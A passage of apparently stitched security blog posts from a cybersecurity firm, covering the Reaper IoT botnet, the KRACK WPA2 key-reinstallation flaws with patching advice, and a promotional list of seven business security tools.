"It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organizations make proper preparations and defense mechanisms are put in place before an attack strikes," Check Point researchers said.
The sheer number of infected IoT devices by Reaper – more than twice the number of Mirai’s victims – show how powerful and devastating Reaper can do when used as a means to launch a DDoS attack.
Gartner projected that 8.4 billion IoT devices will be in use worldwide in 2017 and will reach 20.4 billion by 2020. Examples of IoT devices include security systems (alarm systems, surveillance cameras), automation devices (devices that control lighting, heating and cooling, electricity), smart appliances (refrigerators, vacuums, stoves) and wearables (fitness trackers, clothing, watches).
"As more businesses and homeowners use Internet-connected devices to enhance company efficiency or lifestyle conveniences, their connection to the Internet provides new vulnerabilities for malicious cyber actors to exploit," the US Federal Bureau of Investigation (FBI) said. "Once an IoT device is compromised, cyber criminals can facilitate attacks on other systems or networks, send spam e-mails, steal personal information, interfere with physical safety, and leverage compromised devices for participation in distributed denial of service (DDoS) attacks."
How to Block Reaper IoT Botnet
In most cases, owners of infected IoT devices are unaware that their devices are infected and are used for criminal activities, such as launching a DDoS attack. IoT users who fail to change their devices’ default login and password details, as well as by failing to apply security updates, are part of the problem for “blindly” contributing to cyber criminal activities like DDoS attacks.
Here are the top cyber security measures to stop attackers from infecting your IoT devices and turned it into a botnet:
1. Timely Apply Security Updates of IoT Software
Always apply in a timely manner all security updates issued by your IoT manufacturer.
2. Use Strong Password
While the sophisticated malware like the Reaper can bypass strong password, it still pays to use a strong password to ward off less sophisticated malware.
3. Isolate IoT devices on their own protected networks.
4. Block traffic from unauthorized IP addresses by configuring network firewalls.
5. Turn off IoT devices when not in use.
6. When buying an IoT device, look for manufacturers that offer software updates.
'Secure' Wi-Fi Standard Has Serious Security Flaws
Researchers from the University of Leuven in Belgium have discovered a series of serious wi-fi security flaws that essentially eliminate wi-fi privacy.
These series of wi-fi vulnerabilities collectively dubbed as “Krack”, short for key reinstallation attacks, can access data that was previously presumed to be safely encrypted. Krack attackers can steal wi-fi passwords, chat messages, emails, photos and other sensitive information. It’s also possible, depending on device use and the network configuration, for Krack attackers to inject malicious software like ransomware into websites.
The University of Leuven researchers, in their paper entitled “Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2” (PDF) said that “every Wi-Fi device is vulnerable” to Krack attacks.
"The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations,” lead researcher Mathy Vanhoef said.
Wi-Fi Alliance, a non-profit organization that promotes wi-fi technology and certifies wi-fi products, said, “Recently published research identified vulnerabilities in some Wi-Fi devices where those devices reinstall network encryption keys under certain conditions, disabling replay protection and significantly reducing the security of encryption.”
For its part, the International Consortium for Advancement of Cybersecurity on the Internet (ICASI), in a statement said, “Depending on the specific device configuration, successful exploitation of these vulnerabilities could allow unauthenticated attackers to perform packet replay, decrypt wireless packets, and to potentially forge or inject packets into a wireless network.”
ICASI members include Amazon, Cisco Systems, IBM, Intel Corporation, Juniper Networks, Microsoft Corporation and Oracle Corporation.
How Krack Works
For Krack to work, the attacker must be within the range of a victim. As proof-of-concept, lead researcher Vanhoef executed Krack attacks against wi-fi devices. Vanhoef was able to show that Krack not just steals login credentials – including email addresses and passwords – but all data that the victim transmits or sends was decrypted.
It’s also doable for Krack attackers, depending on the network setup and the device being used, to decrypt, not just data sent over wi-fi but also data sent towards the victim, for instance, the content of a website.
“Although websites or apps may use HTTPS as an additional layer of protection, we warn that this extra protection can (still) be bypassed in a worrying number of situations,” Vanhoef said. “For example, HTTPS was previously bypassed in non-browser software, in Apple's iOS and OS X, in Android apps, in Android apps again, in banking apps, and even in VPN apps.”
Krack is able to decrypt not just data sent over wi-fi but also data sent towards the victim by exploiting the vulnerabilities in the 4-way handshake of the Wi-Fi Protected Access 2 (WPA2) protocol.
The 4-way handshake is a 14-year-old technology that supposedly ensures wi-fi privacy by installing a fresh and unique encryption key that’ll be used to encrypt all subsequent traffic every time a device joins a protected wi-fi network.
Instead of installing a fresh and unique encryption key, Krack tricks the device into reinstalling an already-in-use encryption key. This is done by manipulating and replaying handshake messages. The researchers also found that Krack similarly exploits other wi-fi handshakes, including PeerKey handshake, the group key handshake and the Fast BSS Transition (FT) handshake.
As mentioned, Krack is a series of wi-fi vulnerabilities. This means that not just one wi-fi vulnerability is exploited by Krack. The Common Vulnerabilities and Exposures (CVE) – a dictionary of common names for publicly known cyber security vulnerabilities – list the following specific vulnerabilities related to Krack:
According to Wi-Fi Alliance, there’s no evidence that Krack has been exploited maliciously in the wild.
How to Prevent Krack Attacks
To prevent Krack attacks, make sure to update your wi-fi device as soon as patch or security update becomes available. A security update ensures that an encryption key is only installed once, preventing Krack attacks.
Password change of your wi-fi network won’t stop Krack attacks. The only remedy is to apply the patch or security update of your wi-fi device as soon as it becomes available. It’s also important to update your router’s firmware. While it’s important to patch or apply the latest security updates of your wi-fi and router, it also pays to change the wi-fi password as a precaution.
According to Vanhoef, they notified wi-fi manufacturers about the Krack issue on July 14, 2017. They also notified the Computer Emergency Response Team Coordination Center (CERT/CC) – the world’s first computer emergency response team for internet security incidents. CERT/CC, in turn, issued a broad notification to wi-fi manufacturers on August 28, 2017 about this issue.
“We have released a security update to address this issue,” Microsoft spokesperson told The Verge. “Customers who apply the update, or have automatic updates enabled, will be protected. We continue to encourage customers to turn on automatic updates to help ensure they are protected.”
Windows updates released last October 10, according to Microsoft, addressed this issue. The company said it “withheld disclosure until other vendors could develop and release updates”.
“Wi-Fi Alliance now requires testing for this vulnerability within our global certification lab network and has provided a vulnerability detection tool for use by any Wi-Fi Alliance member,” the alliance said. “Wi-Fi Alliance is also broadly communicating details on this vulnerability and remedies to device vendors and encouraging them to work with their solution providers to rapidly integrate any necessary patches.”
Top 7 Cyber Security Tools for Your Business
With so much of our information online, everyone is vulnerable to hackers and cyber-thieves. When it comes to business, a cyber invasion is a constant threat.
Short term loss could be financial, intellectual property theft, data loss, or worse.
The real threat is the long term loss of trust and reputation damage that could take years to repair. If your clients' information is exposed, it will be hard for them to consider it safe to give you their business again.
Protect your business with these 7 cyber security tools.
7 Cyber Security Tools Your Business Must Be Using
In order to protect your business' digital information, you need a variety of cyber security tools in place.
For complete peace of mind, you'll want to work with a trusted cyber security partner. In the mean time, these tools are a great place to start.
1. Malware Scanners
Malware is short for malicious software. It is designed by hackers to gain access to a computer without the owner's knowledge.
You must have specific anti-malware cyber security tools in place to detect any hacker invasion.
There are a variety of malware scanners out there, many even available for free (with limited features).
Protect your business with automatic malware scanners in place.
2. Routine Patching
Patching is the process of installing a piece of software that repairs any security flaws. Updating an app is an example of patching.
Picture your business's digital infrastructure as a house. Each time you add a new application, piece of software, etc. it's like adding a new room to the house.
Software, apps, and the like are built by humans, meaning that there is room for human error. Human error is like an unlocked door or unfinished window in one of the new rooms.
This can leave a welcome mat out to cyber attackers. That's why your security plan needs to include routine assessments and patching.
3. Two-Factor Authentication
Use two-factor authentication to add a difficult-to-hack layer of security to your log in systems.
Examples include a verification code sent to a linked phone number or a piece of information only the user would know.
4. Restrictive Administrative Access
Add an additional security level for your most sensitive information and infrastructure by restricting who can access it.
Click here for more information on how to implement restrictive admin mode.
5. Network Segmentation
Divide your computer network into sub networks to improve security and performance.
This allows you to isolate the most sensitive data to a specific network to limit access and decrease congestion.
6. Vulnerability Scanning
There's no better way to access your security levels than a vulnerability scan.
Try our free vulnerability assessment to find weaknesses in your code and how to remedy them.
7. 24/7 Security Monitoring
Cyber security protection doesn't come in the form of a quick fix.
Continually protect your business' data with a 24/7 security monitoring system in place to catch attacks the minute they happen.
Protect Your Business for Peace of Mind
Cyber security tools are of the utmost importance for businesses and individuals alike.
Questions? Let us know if there is anything we can help you with. Our emergency response team is available 24/7 if you're currently dealing with a cyber attack. Contact us today.
Steve E. Driz